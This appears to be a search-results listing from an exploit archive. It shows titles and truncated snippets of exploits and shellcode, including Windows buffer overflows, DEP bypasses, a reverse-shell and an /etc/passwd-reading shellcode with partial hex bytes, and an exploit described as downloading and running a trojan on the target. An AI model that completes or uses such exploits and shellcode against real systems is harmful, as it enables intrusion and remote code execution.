7261 matches found
A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow Exploit
No description provided by source. Exploit Title: A-PDF All to MP3 Converter v.2.0.0 stack based buffer overflow Software Link: http://www.a-pdf.com/all-to-mp3/download.htm Version: = 2.0.0 Tested on: Win XP SP3 French Date: 17/01/2011 Author: h1ch4m Email: [email protected] Home:...
Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)
No description provided by source. !/usr/bin/perl Exploit Title: Photodex ProShow Producer v5.0.3310 - Local Buffer Overflow SEH Date: 10-26-2013 Exploit Author: Mike Czumak Tv3rn1x -- @SecuritySift Vulnerable Software: Photodex ProShow Producer v5.0.3310 Software Link:...
MIPS Little Endian Reverse Shell Shellcode (Linux)
No description provided by source. MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators Blog: http://infosec42.blogspot.com Company Website: http://securityevaluators.com .data .bss .text .globl start start:...
Linux bin/cat /etc/passwd 43 bytes
No description provided by source. include stdio.h const char shellcode=\x31\xc0 // xorl %eax,%eax \x99 // cdq \x52 // push edx \x68\x2f\x63\x61\x74 // push dword 0x7461632f \x68\x2f\x62\x69\x6e // push dword 0x6e69622f \x89\xe3 // mov ebx,esp \x52 // push edx \x68\x73\x73\x77\x64 // pu sh dword...
linux/ppc read & exec shellcode 32 bytes
No description provided by source. / readnexecppc-core.c by Charles Stevenson [email protected] / char hellcode = / read0,stack,1028; stack; linux/ppc by core / \x7c\x63\x1a\x79 / xor. r3,r3,r3 / \x38\xa0\x04\x04 / li r5,1028 / \x30\x05\xfb\xff / addic r0,r5,-1025 / \x7c\x24\x0b\x78 / mr r4,r1 /...
mIRC 6.1 "IRC" Protocol Remote Buffer Overflow Exploit
No description provided by source. / remote mirc 6.11 exploit by blasty TESTED ON: Windows XP No SP, Ducth Build: 2600.xpclient.010817-1148 A few days ago, I saw a mIRC advisory on packetstorm 1 and was surprised nobody had written an exploit yet. So I decided to start writing one. Since this was...
RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow
No description provided by source. html object classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687' id='target'/object script language='vbscript' ' Exploit Title: RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow ' Date: July 9, 2010 ' Author: Blake ' Software Link:...
Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit
No description provided by source. !/usr/bin/perl -w Stack Overflow in eZnet.exe - Remote Exploit Will download a trojan from any address which you provide on the target system, then will execute the trojan. For this exploit I have tried several strategies to increase reliability and performance:...
PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit
No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...
os-x/ppc sync(), reboot() 32 bytes
No description provided by source. / MacOSX/PowerPC Shellcode for: sync, reboot 32 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ / include stdio.h include string.h char shellcode = \x7c\x63\x1a\x79 \x39\x40\x01\x06 \x38\x0a\xff\x1e \x44\xff\xff\x02 \x60\x60\x60\x60 \x39\x40\x01\x19...
Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS Internet Information Services. This condition affects IIS 4.0 and IIS 5.0...
Castripper 2.50.70 - (.pls) stack buffer overflow DEP bypass exploit
No description provided by source. !/usr/bin/python Castripper 2.50.70 .pls stack buffer overflow w/ DEP bypass exploit Author: mrme - https://net-ninja.net - mrme AT corelan.be Download: http://www.mini-stream.net/castripper/ Tested on Wind0ws XP SP3 /noexecute=alwayson Greetz: Corelan Security...
CamShot 1.2 - SEH Overwrite Exploit
No description provided by source. CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print Usage: camshot.py target exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print Sending Exploit to: + sys.argv1 GET request + overflow string request =GET /...
Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes
No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS...
RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)
No description provided by source. !/usr/bin/python Title: RM Downloader 3.0.2.1 .asx Local Buffer Overflow SEH Date: 03-29-2010 Author: b0telh0 Link: http://www.mini-stream.net/downloads/RMDownloader.exe Tested on: Windows XP SP3 windows/exec - 227 bytes EXITFUNC=process, CMD=calc.exe shellcode ...
Office 2008 sp0 RTF Pfragments MAC exploit
No description provided by source. RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/...
A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass
No description provided by source. Exploit Title: A-PDF Wav to MP3 Converter v 1.2.0 DEP Bypass Software Link: http://www.a-pdf.com/wav-to-mp3/a-pdf-wtm.exe Version: 1.2.0 Tested on: Win XP SP3 French Date: 12/05/2011 Author: h1ch4m Hicham Oumounid Email: [email protected] Home:...
IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/5885/info The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges...
Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8566/info A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server...
MUSE 4.9.0.006 - (.m3u) Local Buffer Overflow Exploit
No description provided by source. Exploit Title: MUSE v4.9.0.006 .m3u Local Buffer Overflow Exploit Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom Software Link: http://download.cnet.com/MUSE/3000-21404-42511.html Version: 4.9.0.006 Tested on: Windows XP SP3 En...